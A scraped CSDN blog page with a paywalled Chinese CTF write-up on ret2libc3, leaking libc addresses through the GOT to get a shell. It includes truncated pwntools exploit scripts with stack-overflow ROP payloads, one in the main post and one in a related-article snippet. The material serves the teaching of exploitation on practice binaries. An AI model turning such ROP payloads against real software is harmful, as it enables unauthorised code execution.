实验三——ret2libc3地址泄露

最新推荐文章于 2023-05-16 10:18:32 发布
最新推荐文章于 2023-05-16 10:18:32 发布
阅读量1.9k 收藏 3
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44079115/article/details/89334945
版权
在完成ret2libc1和ret2libc2实验后,进一步探讨如何在没有system及/bin/sh函数的情况下实现getshell。通过IDA分析得到主函数地址0x080484FD,利用checksec确认缺少关键保护。通过readelf检查got表信息,并编写脚本执行,以在无特定函数支持的环境中获取shell。
摘要由CSDN通过智能技术生成

我们完成了ret2libc1,ret2libc2两个实验,对getshell有了初步的了解,现在进行无system及/bin/sh函数的情况下获取权限,进行getshell。

调用IDA,查看主函数地址
在这里插入图片描述
得到主函数地址为0x080484FD

用【checksec】查看:不存在必要的保护
checksec

查看got表信息:【readelf -r ret2libc3】
在这里插入图片描述

写下脚本、运行脚本。

这里插入代码

from pwn import *
from LibcSearcher import *

context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']

p=process('./ret2libc3')
elf=ELF('./ret2libc3')
main=0x08048618
payload='a'*(0x6c+4)+p32(elf.plt['puts'])+p32(main)+p3
最低0.47元/天 解锁文章
-Han-
关注
专栏目录
ret2libc3地址泄露--pwn
weixin_44642009的博客
03-17 2796
练习三–ret2libc3地址泄露 在此实验前,我们从简到难实验了ret2libc1,ret2libc2两个实验,对getshell有了一定了解,基本学会了如何在有无system及/bin/sh函数的情况下获取权限,在此以实验二的名为pwn的可执行文件为入手点,进行getshell。 首先,对ret2libc3可执行文件进行检测, checksec ret2libc3 结果如图: 发现其不存...
ret2libc3地址泄露
weixin_44271563的博客
03-24 1558
ret2libc3地址泄露 好难 好难₍₍ (̨̡ ‾᷄ᗣ‾᷅ )̧̢ ₎₎ 先进行代码分析 通过IDA反编译一下,分析代码; 发现本次实验不能直接运用我们之前system函数和bin/sh,所以我们要通过got表和plt表来找到system和bin/sh的准确位置,然后连接代码;最后进行getshell。 先看看别人的思路 先上个cdsn https://ctf-wiki.github.io...
什么是代码重定位
weixin_46089486的博客
10-09 700
ARM体系结构-代码重定位 一、为什么会有重定位 1、程序的运行过程就是CPU不断的从内存中取出指令,然后执行指令的过程。 2、那么CPU是如何从内存中去去这些指令的呢?当然是通过内存地址来获取。 3、以前使用单片机时,没有仔细思考过这个问题,都是认为程序是烧写到芯片内部的flash中的,也没有仔细思考过,程序是怎么跳转到flash取指令并执行的。 4、对于嵌入式系统来说,它的程序可能会比较大,超出它内部的flash大小,我们的程序无法整个放入到芯片内部的flash中;甚至有些SoC芯片内部根本就没有fla
linux中ret2libc入门与实践
counsellor的专栏
08-23 6841
前言 本来想找一个windows下的栈溢出漏洞的poc作为漏洞分析路程的开篇,但是一路走来遇到了太多的问题,大大小小,什么都有。同时因为工作事情比较多,能拿出来调试和写文章的时间也是断断续续。昨天刚有一点心得,今天就忘了一大半,同时会推翻自己之前的结论。 经过漫长的求证过程,打算把NX利剑-ret2libc这种方法和其原理用简单直接的方式展示出来。 简介 DEP-数据执行保护(Data...
java版本词法、语法分析器以及三地址代码生成实验源代码
06-14
用java写的分析器,包含词法分析,语法分析,三地址代码生成,使用了图形界面,压缩包里面还包含了实验报告以及测试数据,超强代码
语法制导的三地址代码生成程序
05-21
输入数据示例: while (a3+15)>0xa do if x2 = 07 then while y 10 goto L2 goto L0 L2: if x2 = 7 goto L3 goto L1 L3: if y < z goto L4 goto L1 L4: t2 = x * y t3 = t2 / z y = t3 goto L3 goto L1 L0: // S.next
ret2libc续(一)——地址泄漏
qq_41560595的博客
12-30 1757
思路 libc文件本来存在于磁盘上,当程序执行时会被载入到虚拟内存中,由于ASLR开着(远程主机),libc地址会变动,但是libc中函数之间的偏移关系是不变的。
一种比较麻烦的Rop链构造——ret2dlresolve
dydxdz的博客
04-09 3855
ret2resolve 题目:0ctf 2018 babystack 上周末做了TCTF(0ctf 2018)的新人赛,题目难度适中,但垃圾如我一如既往没有做出几道题。在7o8v大佬的帮助下,弄懂了babystack的考察点和ret2resolve的利用原理,因此对照着wp记录一波。 0x01 ret2dlresolve原理 当一个程序第一次调用libc中的函数时,必须首先对libc中...
xctf攻防世界_echo——爬坑之路(ret2dlresolve)
勤劳的小蜜蜂
05-27 959
很容易看到是栈溢出漏洞,而且给出了一个sample()的函数来读取flag,直接覆盖返回地址,在本地调试很快就弄完了。但是没想到,跟服务器连接后,死活出不来。没办法,想到上一篇文章一样的坑,看来只能拿Shell才行了。 查找了很多资料,一开始想着用write()函数泄漏,结果没这个函数。还动过使用fprintf函数的想法,但是远程太坑了。留几个学习到的点: 1、 gbd中可以使...
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1613
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
pwn基础之ctfwiki-栈溢出-基础ROP-ret2libc-3
qq_52658640的博客
04-23 1367
文章目录基础知识libc泄露原理利用方法ret2libc3挖掘漏洞利用漏洞利用脚本 基础知识 libc泄露 原理 当有一道题给了可执行文件文件,在ida分析中并不能找到system函数和binsh地址,这时我们就可以利用在栈溢出之前执行过的函数泄露libc的版本。因为libc函数相对于libc的基地址都是确定的,采用 got 表泄露,即输出某个函数对应的 got 表项的内容,所以就可以通过上述方法来获取libc函数中的system地址和字符binsh的地址。 system 函数属于 libc,而 libc
ret2libc3
m0_49959202的博客
08-06 401
文章目录ret2libc31.程序分析2.栈帧设计3.exp编写 ret2libc3 当前的ret2libc3:无system,无”\bin\sh“ 1.程序分析 首先file一下,发现是32位程序: checksec一下,发现没有开启pie ida分析程序: 发现有个See_something()函数可以用来泄露具体给定地址内的信息: main函数内还有个Print_message(),可以用来栈溢出: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SKJoX7
ctf wiki ret2lib3
最新发布
weixin_55885866的博客
05-16 117
由于直接发送会导致,接下来接收的字符串并不是我们所需要的字符串。可能接收到printf函数输出的字符串。关于为什么会使用sendline而不是send 由于gets 函数遇到\n停止读取。注:不能直接用elf 去查看函数位置,因为查询的是plt处的func地址。通过泄露gots表中的数据去判断动态库的基地址。关于为什么第一次使用sendlineafter。
pwn ——ret2libc3
qq_41696518的博客
07-06 863
ret2libc3
基本ROP之ret2libc3
至臻求学,胸怀云月
02-15 5407
ret2libc思路 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址。 ret2libc通常可以分为下面这几类: 程序中自身就含有system函数和"/bin/sh"字符串 程序中自身就有s...
Ret2libc
钞sir的博客
01-26 8998
三生三世十里桃花 她就像是一道疤 像风像雨像飞沙 像空气一样难抓 简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有sys...
ret2libc
huzai9527的博客
02-03 467
1. buooj - ciscn_2019_c_1(64 位) from pwn import * #p = remote('node3.buuoj.cn',28190) p = process('./ciscn_2019_c_1') context.log_level = 'debug' puts_plt = 0x4006e0 puts_got = 0x602020 gets_got = 0x602050 pop_rdi = 0x0000000000400c83 main = 0x4009a0 #ste
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值